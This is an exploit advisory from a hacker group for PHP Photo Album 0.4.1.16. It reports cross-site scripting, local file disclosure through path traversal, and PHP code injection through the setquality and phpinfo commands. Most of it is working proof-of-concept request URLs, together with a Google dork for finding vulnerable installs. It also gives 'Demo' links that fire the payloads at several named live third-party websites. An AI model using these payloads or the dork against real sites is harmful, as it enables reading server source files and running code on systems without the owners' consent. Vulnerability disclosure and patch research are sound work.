PHP Photo Album 0.4.1.16 Cross Site Scripting / Disclosure

----------------------------------------------------------------
PHP Photo Album <= (0.4.1.16) Multiple Disclosure Vulnerabilities
----------------------------------------------------------------

# Exploit Title: PHP Photo Album <= (0.4.1.16) Multiple Disclosure
Vulnerabilities
# Google Dork: inurl:main.php?cmd=imageview&var1=
# Application Name: [PHP Photo Album]
# Date: 2011-10-29
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: [ http://www.phpalbum.net/dw ]
# Version: [ 0.4.1.16 ]
# Impact : [ High ]
# Tested on: [linux+apache]
# CVE : Webapps
# Finder(s):
    - Net.Edit0r (Net.edit0r [at] att [dot] net)
    - tHe.k!ll3r (Attack-bhg [at] att [dot] net)
    - 2MzRp  (mzrp2 [at] Yahoo [dot] com )

# Description: : Given the vulnerability you want to read files on the
server must have access

+-----------------------+
| Cross Site scripting  |
+-----------------------+

The vulnerable code is located in /www/main.php?cmd=imageview&var1=[XSS]


Proof of Concept:
-----------------


~ PoC : http://localhost/phpAlbum/main.php?cmd=imageview&var1=[XSS]

  ~ Demo : http://www.phpalbum.net/demo3/main.php?cmd=imageview&var1=<BODY
ONLOAD=alert('XSS')>

~ Poc 2

http://localhost/phpAlbum/main.php?cmd=albumnew&keyword=[XSS]

  ~ Demo :http://www.iloveazucar.com/phpAlbum/main.php?cmd=albumnew&keyword="onmouseover%3dprompt(975554)
bad%3d"

  ~ Demo :http://www.dolfpretorius.com/main.php?cmd=albumnew&keyword="onmouseover=prompt(975554)
bad="

+----------------------+
| Download/Source Code |
+----------------------+

The vulnerable code is located in /www/main.php

Proof of Concept:
-----------------

~ PoC : http://localhost/phpAlbum/main.php?cmd=image&var1=[LFD]

~ PoC : http://localhost/phpAlbum/main.php?cmd=image&var1=../main.php

  ~ Demo : http://www.mihoby.org/phpAlbum/main.php?cmd=image&var1=../main.php

~ PoC 2 : http://localhost/main.php?cmd=themeimage&var1=[LFD]

  ~ Demo :http://www.dolfpretorius.com/main.php?cmd=themeimage&var1=comments.tpl.php
  ~ Demo :http://www.biochem.dal.ca/outreach/phpAlbum/main.php?cmd=themeimage&var1=login.tpl.php

# Important Notes:

Php files from source to display (Veiw Page Source) your browser


+--------------------+
| PHP Code Injection |
+--------------------+

The vulnerable code is located in /www/main.php

124 :       Array
125 :       (
126 :              [0] => cmd=phpinfo
127 :        )


Proof of Concept:
-----------------

~ PoC : http://localhost/phpAlbum/main.php?cmd=phpinfo

~ PoC : http://localhost/demo3/main.php?keyword=hack&cmd=phpinfo

  ~ Demo : http://www.dolfpretorius.com/main.php?cmd=phpinfo

~ PoC 2 http://localhost/main.php?cmd=setquality&var1=[PHP Code Injection]

  ~ Demo : http://www.manufacturinget.com/album/main.php?cmd=setquality&var1=${@print(bhg)}\



[-] Disclosure timeline:

[12/10/2011] - Vulnerabilities discovered
[14/10/2011] - Others vulnerabilities discovered
[15/10/2011] - Issues reported to http://black-hg.org
[29/10/2011] - Public disclosure


# Greets To :

Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ 2MzRp ~
ArYaIeIrAn ~ Mikili

cmaxx ~ G3n3Rall ~ Mr.XHat ~  M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter
~ NoL1m1t

s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ  ./Persian Gulf

===========================================[End]=============================================